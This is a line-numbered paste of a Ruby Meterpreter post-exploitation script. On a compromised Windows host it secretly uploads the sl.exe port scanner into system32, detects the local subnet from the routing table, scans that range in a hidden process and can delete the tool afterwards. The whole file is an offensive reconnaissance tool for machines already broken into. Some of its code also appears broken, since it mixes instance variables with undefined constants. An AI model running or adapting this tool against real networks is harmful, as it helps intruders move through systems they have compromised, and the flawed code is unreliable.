#!/usr/bin/env rubyrequire 'ftools'#########################################

1. #!/usr/bin/env ruby
2. require 'ftools'
3. ############################################################
4. #     This is an Meterpreter script to do a portscanning of#
5. #the same network where the controled computer is          #
6. #using a portscanner called sl.exe                         #
7. #                                                          #
8. ############################################################
9. #   If netmask isn't 255.255.255.0 it must work any way    #
10. ############################################################
11. #   Tested in Win2003 and WinXP                            #
12. ############################################################
13. #   Created by Augusto Pereyra aepereyra(at)gmail.com      #
14. ############################################################
15. #   Made Awesome by PodJackel, podjackel@gmail.com         #
16. ############################################################
17.  
18.  
19. @@exec_opts = Rex::Parser::Arguments.new(
20.   "-h"  => [ false,  "Help menu."],
21.   "-r"  => [ true,  "To set the range manualy"],
22.   "-a"  => [ false,  "For automatic lan detection and port scan"],
23.   "-s"  => [ false,  "Tool Source Path (Default: /pentest/windows-binaries/scanners/sl.exe)"],
24.   "-d"  => [ false,  "Client Destination Path (Default: %windir%\\system32\\sl.exe)"],
25.   "-c"   => [ false,  "Delete tool from host after scan"]
26. )
27.  
28.  
29. #Function for upload the port scanner
30.  
31. def uploadtool (dst, src)
32. print_status("Uploading Portscanner to target")
33. #Here you can set the path where sl.exe is in owr system and Where will be wher run this tool
34. #sl.exe was created by foundstone
35. client.fs.file.upload_file(dst, src)
36. end
37.  
38. def removetool (src)
39. print_status("Removing Portscanner from target")
40. client.fs.file.rm(src)
41. end
42.  
43.  
44. #Function for network autodetection
45.  
46. def auto ()
47.     session1 = client
48.     cuenta = 0
49.     l1 = Array.new
50.     rangoar = Array.new
51.     res = session1.sys.process.execute("route print", nil, {'Hidden' => true, 'Channelized' => true})
52.     while(d1 = res.channel.read)
53.                         d1.each do |line|
54.  
55.                                 if line =~ /( 0.0.0.0)/
56.                                         l1= line.split
57.                                         res.channel.close
58.                                 end
59.                         end
60.     xx= l1[3]
61.     sxx1 = xx.split(".")
62.     sxx2 = xx.split(".")
63.     sxx1[3]='1'
64.     sxx2[3]='254'
65.     rango1= sxx1.join(".")
66.     rango2= sxx2.join(".")
67.     rangoar[0]=rango1
68.     rangoar[1]=rango2
69.     rango= rangoar.join("-")
70.     return rango
71.      end
72. end
73.  
74.  
75. ####################################################################
76. #Function for Port Scanning#########################################
77. ####################################################################
78.  
79. def portscan(iprange,path)
80.     print_status("Performing portscanning for IP range #{iprange}")
81.  
82. session = client
83. cuentah = 0
84. a1 = Array.new
85. session.response_timeout= 100
86. res = session.sys.process.execute("#{path} -q 1000 -c 500 -h #{iprange}", nil, {'Hidden' => true, 'Channelized' => true})
87.     while(d = res.channel.read)
88.         d.each do |line|
89.             a1.insert(cuentah, line)
90.             cuentah = cuentah + 1
91.             res.channel.close
92.         end
93.     end
94. a1.each { |v| puts v }
95.  
96. end
97. #####################################################################
98. #This is me##########################################################
99. #####################################################################
100. def mysign ()
101.  
102. print_status("Created by Augusto Pereyra, aepereyra at gmail.com")
103. print_status("Made Awesome by PodJackel, podjackel@gmail.com")
104.  
105. end
106.  
107. #####################################################################
108. #  MAIN  ############################################################
109. #####################################################################
110. # Parsing of Options
111.  
112. range = nil
113. porsc = nil
114.  
115. @WinPath=client.fs.file.expand_path("%windir%\\system32\\sl.exe")
116. @ToolPath="/pentest/windows-binaries/scanners/sl.exe"
117. @Clean=0
118.  
119. @@exec_opts.parse(args){ |opt, idx, val|
120.     case opt
121.  
122.     when "-a"
123.         porsc = 2
124.     when "-r"
125.         range = val
126.     when "-d"
127.         WinPath = val
128.     when "-s"
129.         ToolPath = val
130.     when "-c"
131.         Clean = 1
132.        
133.    end
134. }
135.  
136.  
137.  
138. if range != nil && porsc != 2
139.     mysign()
140.     uploadtool(WinPath, ToolPath)
141.     portscan(range,WinPath)
142.     if Clean==1 then
143.         removetool(WinPath)
144.     end
145. elsif  porsc == 2
146.     mysign()
147.     uploadtool(WinPath, ToolPath)
148.     range= auto()
149.     portscan(range,WinPath)
150.     if Clean==1 then
151.         removetool(WinPath)
152.     end
153. else
154.     mysign()
155.     print( @@exec_opts.usage)
156. end